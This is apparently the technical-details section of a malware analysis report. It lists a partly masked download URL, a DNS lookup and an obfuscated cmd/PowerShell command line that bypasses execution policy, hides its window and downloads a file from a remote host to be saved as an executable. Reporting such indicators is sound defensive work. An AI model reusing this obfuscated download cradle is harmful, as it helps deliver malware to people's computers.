Technical information
- http://www.do###sope.top/read.php?f=##### as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OwersheLl.exE -e^X^E^cUt^IOnPo^Lic^y^ Bypa^SS^ -No^P^r^ofi^Le^ -wInD^O^WsTYlE HIdDe^N ^(New-O^bJeCT^ sYstem.nEt^.web^cLIeNT).^D^Ow^nlOadfi^L^e('http://www.do###sope.top/read.ph...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^OwersheLl.exE -e^X^E^cUt^IOnPo^Lic^y^ Bypa^SS^ -No^P^r^ofi^Le^ -wInD^O^WsTYlE HIdDe^N ^(New-O^bJeCT^ sYstem.nEt^.web^cLIeNT).^D^Ow^nlOadfi^L^e('http://www.do###sope.top/read.ph...' (with hidden window)